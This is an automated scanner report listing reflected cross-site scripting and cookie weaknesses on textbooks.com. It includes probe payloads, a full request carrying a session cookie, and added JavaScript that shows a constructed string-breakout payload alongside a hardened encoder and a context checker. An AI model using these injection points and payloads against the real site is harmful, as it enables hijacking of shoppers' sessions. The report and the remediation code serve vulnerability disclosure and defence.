textbooks.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting in textbooks.com | Vulnerability Crawler Report

Report generated by XSS.CX at Mon Dec 27 10:33:14 CST 2010.


Contents

1. Cross-site scripting (reflected)


1.1. http://www.textbooks.com/Author/Peter_Vorderer.php [REST URL parameter 1]

1.2. http://www.textbooks.com/Author/Peter_Vorderer.php [REST URL parameter 2]

1.3. http://www.textbooks.com/BooksDescription.php [REST URL parameter 1]

1.4. http://www.textbooks.com/BuyBack-Search.php [REST URL parameter 1]

1.5. http://www.textbooks.com/Cart.php [REST URL parameter 1]

1.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php [REST URL parameter 1]

1.7. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php [REST URL parameter 3]

1.8. http://www.textbooks.com/Catalog/B/Business-and-Economics.php [REST URL parameter 1]

1.9. http://www.textbooks.com/Catalog/B/Business-and-Economics.php [REST URL parameter 3]

1.10. http://www.textbooks.com/Catalog/C/Communication-and-Media.php [REST URL parameter 1]

1.11. http://www.textbooks.com/Catalog/C/Communication-and-Media.php [REST URL parameter 3]

1.12. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php [REST URL parameter 1]

1.13. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php [REST URL parameter 3]

1.14. http://www.textbooks.com/Catalog/E/Education.php [REST URL parameter 1]

1.15. http://www.textbooks.com/Catalog/E/Education.php [REST URL parameter 3]

1.16. http://www.textbooks.com/Catalog/G/History-and-Geography.php [REST URL parameter 1]

1.17. http://www.textbooks.com/Catalog/G/History-and-Geography.php [REST URL parameter 3]

1.18. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php [REST URL parameter 1]

1.19. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php [REST URL parameter 3]

1.20. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php [REST URL parameter 1]

1.21. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php [REST URL parameter 3]

1.22. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php [REST URL parameter 1]

1.23. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php [REST URL parameter 3]

1.24. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php [REST URL parameter 1]

1.25. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php [REST URL parameter 3]

1.26. http://www.textbooks.com/Catalog/M/Math-and-Science.php [REST URL parameter 1]

1.27. http://www.textbooks.com/Catalog/M/Math-and-Science.php [REST URL parameter 3]

1.28. http://www.textbooks.com/Catalog/P/Medicine.php [REST URL parameter 1]

1.29. http://www.textbooks.com/Catalog/P/Medicine.php [REST URL parameter 3]

1.30. http://www.textbooks.com/Catalog/R/Reference-Materials.php [REST URL parameter 1]

1.31. http://www.textbooks.com/Catalog/R/Reference-Materials.php [REST URL parameter 3]

1.32. http://www.textbooks.com/Catalog/S/Social-Sciences.php [REST URL parameter 1]

1.33. http://www.textbooks.com/Catalog/S/Social-Sciences.php [REST URL parameter 3]

1.34. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php [REST URL parameter 1]

1.35. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php [REST URL parameter 3]

1.36. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php [REST URL parameter 1]

1.37. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php [REST URL parameter 3]

1.38. http://www.textbooks.com/CustServ-Contact.php [REST URL parameter 1]

1.39. http://www.textbooks.com/CustServ-FAQ.php [REST URL parameter 1]

1.40. http://www.textbooks.com/CustServ-Home.php [REST URL parameter 1]

1.41. http://www.textbooks.com/CustServ-HowToShop.php [REST URL parameter 1]

1.42. http://www.textbooks.com/CustServ-Privacy.php [REST URL parameter 1]

1.43. http://www.textbooks.com/CustServ-ShippingPolicy.php [REST URL parameter 1]

1.44. http://www.textbooks.com/CustServ-Terms.php [REST URL parameter 1]

1.45. http://www.textbooks.com/CustServ-WhyTB.php [REST URL parameter 1]

1.46. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php [REST URL parameter 1]

1.47. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php [REST URL parameter 4]

1.48. http://www.textbooks.com/Search.php [REST URL parameter 1]

1.49. http://www.textbooks.com/affiliates.php [REST URL parameter 1]

1.50. http://www.textbooks.com/buy-textbooks.php [REST URL parameter 1]

1.51. http://www.textbooks.com/css/prod5.css [REST URL parameter 1]

1.52. http://www.textbooks.com/css/prod5.css [REST URL parameter 2]

1.53. http://www.textbooks.com/css/tb-v3.css [REST URL parameter 1]

1.54. http://www.textbooks.com/css/tb-v3.css [REST URL parameter 2]

1.55. http://www.textbooks.com/custserv-intprop.php [REST URL parameter 1]

1.56. http://www.textbooks.com/custserv-whatisused.php [REST URL parameter 1]

1.57. http://www.textbooks.com/etextbooks.php [REST URL parameter 1]

1.58. http://www.textbooks.com/financial-aid-tips.php [REST URL parameter 1]

1.59. http://www.textbooks.com/js/browse.js [REST URL parameter 1]

1.60. http://www.textbooks.com/js/browse.js [REST URL parameter 2]

1.61. http://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 1]

1.62. http://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 2]

1.63. http://www.textbooks.com/js/main.js [REST URL parameter 1]

1.64. http://www.textbooks.com/js/main.js [REST URL parameter 2]

1.65. http://www.textbooks.com/js/php.js [REST URL parameter 1]

1.66. http://www.textbooks.com/js/php.js [REST URL parameter 2]

1.67. http://www.textbooks.com/js/s_code.js [REST URL parameter 1]

1.68. http://www.textbooks.com/js/s_code.js [REST URL parameter 2]

1.69. http://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 1]

1.70. http://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 2]

1.71. http://www.textbooks.com/modcss.php [REST URL parameter 1]

1.72. http://www.textbooks.com/rent-textbooks.php [REST URL parameter 1]

1.73. http://www.textbooks.com/sell-textbooks.php [REST URL parameter 1]

1.74. http://www.textbooks.com/used-textbooks.php [REST URL parameter 1]

1.75. https://www.textbooks.com/account.php [REST URL parameter 1]

1.76. https://www.textbooks.com/checkout.php [REST URL parameter 1]

1.77. https://www.textbooks.com/css/tb-v3.css [REST URL parameter 1]

1.78. https://www.textbooks.com/css/tb-v3.css [REST URL parameter 2]

1.79. https://www.textbooks.com/js/browse.js [REST URL parameter 1]

1.80. https://www.textbooks.com/js/browse.js [REST URL parameter 2]

1.81. https://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 1]

1.82. https://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 2]

1.83. https://www.textbooks.com/js/main.js [REST URL parameter 1]

1.84. https://www.textbooks.com/js/main.js [REST URL parameter 2]

1.85. https://www.textbooks.com/js/php.js [REST URL parameter 1]

1.86. https://www.textbooks.com/js/php.js [REST URL parameter 2]

1.87. https://www.textbooks.com/js/s_code.js [REST URL parameter 1]

1.88. https://www.textbooks.com/js/s_code.js [REST URL parameter 2]

1.89. https://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 1]

1.90. https://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 2]

1.91. https://www.textbooks.com/modcss.php [REST URL parameter 1]

1.92. http://www.textbooks.com/Cart.php [Referer HTTP header]

1.93. https://www.textbooks.com/checkout.php [Referer HTTP header]

2. SSL cookie without secure flag set

2.1. https://www.textbooks.com/

2.2. https://www.textbooks.com/account.php

2.3. https://www.textbooks.com/checkout.php

3. Cookie scoped to parent domain

3.1. http://www.textbooks.com/

3.2. http://www.textbooks.com/Author/Peter_Vorderer.php

3.3. http://www.textbooks.com/BooksDescription.php

3.4. http://www.textbooks.com/BuyBack-Search.php

3.5. http://www.textbooks.com/Cart.php

3.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php

3.7. http://www.textbooks.com/Catalog/B/Business-and-Economics.php

3.8. http://www.textbooks.com/Catalog/C/Communication-and-Media.php

3.9. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php

3.10. http://www.textbooks.com/Catalog/E/Education.php

3.11. http://www.textbooks.com/Catalog/G/History-and-Geography.php

3.12. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php

3.13. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php

3.14. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php

3.15. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php

3.16. http://www.textbooks.com/Catalog/M/Math-and-Science.php

3.17. http://www.textbooks.com/Catalog/P/Medicine.php

3.18. http://www.textbooks.com/Catalog/R/Reference-Materials.php

3.19. http://www.textbooks.com/Catalog/S/Social-Sciences.php

3.20. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

3.21. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php

3.22. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

3.23. http://www.textbooks.com/buy-textbooks.php

3.24. http://www.textbooks.com/etextbooks.php

3.25. http://www.textbooks.com/rent-textbooks.php

3.26. http://www.textbooks.com/sell-textbooks.php

3.27. https://www.textbooks.com/

3.28. https://www.textbooks.com/account.php

3.29. https://www.textbooks.com/checkout.php

4. Cookie without HttpOnly flag set

4.1. http://www.textbooks.com/

4.2. http://www.textbooks.com/Author/Peter_Vorderer.php

4.3. http://www.textbooks.com/BooksDescription.php

4.4. http://www.textbooks.com/BuyBack-Search.php

4.5. http://www.textbooks.com/Cart.php

4.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php

4.7. http://www.textbooks.com/Catalog/B/Business-and-Economics.php

4.8. http://www.textbooks.com/Catalog/C/Communication-and-Media.php

4.9. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php

4.10. http://www.textbooks.com/Catalog/E/Education.php

4.11. http://www.textbooks.com/Catalog/G/History-and-Geography.php

4.12. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php

4.13. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php

4.14. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php

4.15. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php

4.16. http://www.textbooks.com/Catalog/M/Math-and-Science.php

4.17. http://www.textbooks.com/Catalog/P/Medicine.php

4.18. http://www.textbooks.com/Catalog/R/Reference-Materials.php

4.19. http://www.textbooks.com/Catalog/S/Social-Sciences.php

4.20. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

4.21. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php

4.22. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

4.23. http://www.textbooks.com/buy-textbooks.php

4.24. http://www.textbooks.com/etextbooks.php

4.25. http://www.textbooks.com/rent-textbooks.php

4.26. http://www.textbooks.com/sell-textbooks.php

4.27. https://www.textbooks.com/

4.28. https://www.textbooks.com/account.php

4.29. https://www.textbooks.com/checkout.php

5. Password field with autocomplete enabled

6. Cross-domain Referer leakage

6.1. http://www.textbooks.com/BooksDescription.php

6.2. http://www.textbooks.com/js/browse.js

6.3. https://www.textbooks.com/js/browse.js

7. Cross-domain script include

7.1. http://www.textbooks.com/

7.2. http://www.textbooks.com/Author/Peter_Vorderer.php

7.3. http://www.textbooks.com/BooksDescription.php

7.4. http://www.textbooks.com/BuyBack-Search.php

7.5. http://www.textbooks.com/Cart.php

7.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php

7.7. http://www.textbooks.com/Catalog/B/Business-and-Economics.php

7.8. http://www.textbooks.com/Catalog/C/Communication-and-Media.php

7.9. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php

7.10. http://www.textbooks.com/Catalog/E/Education.php

7.11. http://www.textbooks.com/Catalog/G/History-and-Geography.php

7.12. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php

7.13. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php

7.14. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php

7.15. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php

7.16. http://www.textbooks.com/Catalog/M/Math-and-Science.php

7.17. http://www.textbooks.com/Catalog/P/Medicine.php

7.18. http://www.textbooks.com/Catalog/R/Reference-Materials.php

7.19. http://www.textbooks.com/Catalog/S/Social-Sciences.php

7.20. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

7.21. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php

7.22. http://www.textbooks.com/CustServ-Contact.php

7.23. http://www.textbooks.com/CustServ-FAQ.php

7.24. http://www.textbooks.com/CustServ-Home.php

7.25. http://www.textbooks.com/CustServ-HowToShop.php

7.26. http://www.textbooks.com/CustServ-Privacy.php

7.27. http://www.textbooks.com/CustServ-ShippingPolicy.php

7.28. http://www.textbooks.com/CustServ-Terms.php

7.29. http://www.textbooks.com/CustServ-WhyTB.php

7.30. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

7.31. http://www.textbooks.com/Search.php

7.32. http://www.textbooks.com/affiliates.php

7.33. http://www.textbooks.com/buy-textbooks.php

7.34. http://www.textbooks.com/custserv-intprop.php

7.35. http://www.textbooks.com/custserv-whatisused.php

7.36. http://www.textbooks.com/etextbooks.php

7.37. http://www.textbooks.com/financial-aid-tips.php

7.38. http://www.textbooks.com/rent-textbooks.php

7.39. http://www.textbooks.com/sell-textbooks.php

7.40. http://www.textbooks.com/used-textbooks.php

7.41. https://www.textbooks.com/

7.42. https://www.textbooks.com/account.php

7.43. https://www.textbooks.com/checkout.php

8. Email addresses disclosed

8.1. http://www.textbooks.com/CustServ-Privacy.php

8.2. http://www.textbooks.com/affiliates.php

8.3. http://www.textbooks.com/custserv-intprop.php

9. Cacheable HTTPS response

9.1. https://www.textbooks.com/

9.2. https://www.textbooks.com/account.php

9.3. https://www.textbooks.com/checkout.php

10. HTML does not specify charset

10.1. http://www.textbooks.com/

10.2. http://www.textbooks.com/Author/Peter_Vorderer.php

10.3. http://www.textbooks.com/BooksDescription.php

10.4. http://www.textbooks.com/BuyBack-Search.php

10.5. http://www.textbooks.com/Cart.php

10.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php

10.7. http://www.textbooks.com/Catalog/B/Business-and-Economics.php

10.8. http://www.textbooks.com/Catalog/C/Communication-and-Media.php

10.9. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php

10.10. http://www.textbooks.com/Catalog/E/Education.php

10.11. http://www.textbooks.com/Catalog/G/History-and-Geography.php

10.12. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php

10.13. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php

10.14. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php

10.15. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php

10.16. http://www.textbooks.com/Catalog/M/Math-and-Science.php

10.17. http://www.textbooks.com/Catalog/P/Medicine.php

10.18. http://www.textbooks.com/Catalog/R/Reference-Materials.php

10.19. http://www.textbooks.com/Catalog/S/Social-Sciences.php

10.20. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

10.21. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php

10.22. http://www.textbooks.com/CustServ-Contact.php

10.23. http://www.textbooks.com/CustServ-FAQ.php

10.24. http://www.textbooks.com/CustServ-Home.php

10.25. http://www.textbooks.com/CustServ-HowToShop.php

10.26. http://www.textbooks.com/CustServ-Privacy.php

10.27. http://www.textbooks.com/CustServ-ShippingPolicy.php

10.28. http://www.textbooks.com/CustServ-Terms.php

10.29. http://www.textbooks.com/CustServ-WhyTB.php

10.30. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

10.31. http://www.textbooks.com/Search.php

10.32. http://www.textbooks.com/affiliates.php

10.33. http://www.textbooks.com/buy-textbooks.php

10.34. http://www.textbooks.com/custserv-intprop.php

10.35. http://www.textbooks.com/custserv-whatisused.php

10.36. http://www.textbooks.com/etextbooks.php

10.37. http://www.textbooks.com/financial-aid-tips.php

10.38. http://www.textbooks.com/rent-textbooks.php

10.39. http://www.textbooks.com/sell-textbooks.php

10.40. http://www.textbooks.com/used-textbooks.php

10.41. https://www.textbooks.com/

10.42. https://www.textbooks.com/account.php

10.43. https://www.textbooks.com/checkout.php



1. Cross-site scripting (reflected)
There are 93 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain; and user input should be HTML-encoded (or encoded for whatever context it is inserted into, such as a JavaScript string literal) at every point where it is copied into application responses. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.textbooks.com/Author/Peter_Vorderer.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Author/Peter_Vorderer.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f117d'%3b70a1f109c52 was submitted in the REST URL parameter 1. This input was echoed as f117d';70a1f109c52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
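Worked example of the pattern the remediation background and this remediation detail describe. This is added here and is not code from the XSS.CX report or from textbooks.com: the 404 page copies the request path into s.pageName inside a single-quoted JavaScript literal, so renderPageNameVulnerable reproduces that concatenation and renderPageNameSafe shows the fix, encoding the value for a JavaScript string context at the point it enters the script. The function names and the evaluation harness are hypothetical. Only the first payload is the scanner's own; the second, breakout payload is constructed to illustrate the class of problem and is not a verified proof-of-concept against the host (the report states none was found).

```javascript
// Added example, not code from the XSS.CX report or from textbooks.com.
// The 404 page copies the request path into a single-quoted JS literal:
//     s.pageName = '404:<request path>'
// renderPageNameVulnerable reproduces that; renderPageNameSafe is the fix.
// All function names here are hypothetical.

// Payload taken from the report (URL-decoded form of f117d'%3b70a1f109c52).
const SCANNER_PAYLOAD = "f117d';70a1f109c52";
// Constructed illustration of a string-context breakout. Not a verified
// proof-of-concept against the host; the report states none was found.
const BREAKOUT_PAYLOAD = "';s.injected=true;//";

function authorPath(segment) {
  return "/Author" + segment + "/Peter_Vorderer.php";
}

// Vulnerable: raw concatenation into the quoted literal, as in the response.
function renderPageNameVulnerable(path) {
  return "s.pageName = '404:" + path + "'";
}

// Encode for a JavaScript string context: everything outside a small
// allow-list becomes \xHH (or \uHHHH above 0xFF). That neutralises quotes,
// backslashes, semicolons, newlines and the '<' of a closing </script> tag.
function jsStringEncode(value) {
  return String(value).replace(/[^A-Za-z0-9 .\/:_-]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Hardened: same template, value encoded at the point it enters the script.
function renderPageNameSafe(path) {
  return "s.pageName = '404:" + jsStringEncode(path) + "'";
}

// Run a rendered snippet roughly as the browser would, in its own function
// scope, and return the resulting s object (or the parse error). The
// newlines matter: a // in the payload comments out the rest of its own
// line only, exactly as it would inside a <script> block.
function evaluateSnippet(snippet) {
  try {
    const fn = new Function("var s = {};\n" + snippet + "\nreturn s;");
    return { ok: true, s: fn() };
  } catch (err) {
    return { ok: false, error: err.name };
  }
}

// Side-by-side summary for one path: what each renderer emits and what
// happens when the emitted script runs.
function compare(path) {
  const vuln = renderPageNameVulnerable(path);
  const safe = renderPageNameSafe(path);
  return {
    vulnerable: { script: vuln, result: evaluateSnippet(vuln) },
    hardened: { script: safe, result: evaluateSnippet(safe) },
  };
}

console.log(JSON.stringify(compare(authorPath(SCANNER_PAYLOAD)), null, 2));
console.log(JSON.stringify(compare(authorPath(BREAKOUT_PAYLOAD)), null, 2));
```

With the scanner's own payload the vulnerable render no longer parses (the literal is closed and 70a1f109c52 is left as bare code), which is the observation the report records; with the constructed payload the injected statement runs. The hardened render round-trips both values unchanged into s.pageName and executes nothing else. Encoding with \xHH rather than HTML entities is deliberate: inside a script block the HTML parser does not decode entities, so only a JavaScript-level escape is effective there.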

Request

GET /Authorf117d'%3b70a1f109c52/Peter_Vorderer.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3641
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:51 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
rchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Authorf117d';70a1f109c52/Peter_Vorderer.php'

</script>
...[SNIP]...
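Added check, not from the report, that reproduces the scanner's judgement for this instance ("copied into a JavaScript string which is encapsulated in single quotation marks") against a response body. The sample body is a constructed condensation of the 404 response shown above; classifyReflection and scanJsState are hypothetical helper names. Two caveats a practitioner wants when re-testing: the probe has to be searched for in its decoded form (%3b arrives in the page as ;), and a probe that comes back HTML- or JS-encoded is reported as not reflected verbatim, which is the outcome to look for after the fix.

```javascript
// Added check, not from the report: reproduce the scanner's context
// judgement ("copied into a JavaScript string encapsulated in single
// quotation marks") on a response body. Helper names are hypothetical.

// Constructed, condensed from the 404 response shown in the report.
const SAMPLE_RESPONSE = `<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style> body { background: #fff } </style>
<script type='text/javascript'>
function searchReset() {
    sObj    = document.getElementById('hpSearchText');
    if (sObj.value == '')
        sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

    s.pageType    = 'errorPage'
    s.pageName    = '404:/Authorf117d';70a1f109c52/Peter_Vorderer.php'

</script>
</head>
<body></body>
</html>`;

// Minimal JavaScript lexer state machine: returns the lexical state at the
// end of text, one of "code", "line" (// comment), "block" (/* comment) or
// the opening quote character of an unterminated string literal. Regex
// literals and the / division ambiguity are deliberately not handled.
function scanJsState(text) {
  let state = "code";
  for (let i = 0; i < text.length; i++) {
    const ch = text[i];
    const next = text[i + 1];
    if (state === "code") {
      if (ch === "'" || ch === '"' || ch === "`") state = ch;
      else if (ch === "/" && next === "/") { state = "line"; i++; }
      else if (ch === "/" && next === "*") { state = "block"; i++; }
    } else if (state === "line") {
      if (ch === "\n") state = "code";
    } else if (state === "block") {
      if (ch === "*" && next === "/") { state = "code"; i++; }
    } else {
      if (ch === "\\") i++;             // escaped character: skip it
      else if (ch === state) state = "code";
    }
  }
  return state;
}

// Locate the probe verbatim (its decoded form; %3b arrives as ';'), find
// the <script> block containing it, and compare the lexical state just
// before the probe with the state after it. A string state before and a
// different state after means the probe closed the literal.
function classifyReflection(body, probe) {
  const idx = body.indexOf(probe);
  if (idx === -1) return { reflected: false };   // absent or encoded on output
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(body)) !== null) {
    // script content ends 9 characters ("</script>") before the match ends
    const end = m.index + m[0].length - 9;
    const start = end - m[1].length;
    if (idx >= start && idx + probe.length <= end) {
      const prefix = body.slice(start, idx);
      const before = scanJsState(prefix);
      const after = scanJsState(prefix + probe);
      const inString = before === "'" || before === '"' || before === "`";
      return {
        reflected: true,
        inScript: true,
        context: before,
        terminated: inString && after !== before,
      };
    }
  }
  return { reflected: true, inScript: false, context: "html", terminated: false };
}

console.log(classifyReflection(SAMPLE_RESPONSE, "f117d';70a1f109c52"));
```

For the sample body this returns reflected, inScript, context "'" and terminated, matching the report's finding for this instance. Re-running it on the same URL after a fix should give reflected: false (the quote came back as \x27 or similar), or terminated: false if the application has started escaping only the quote.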

1.2. http://www.textbooks.com/Author/Peter_Vorderer.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Author/Peter_Vorderer.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac74d'%3b4c3476296cf was submitted in the REST URL parameter 2. This input was echoed as ac74d';4c3476296cf in the application's response.

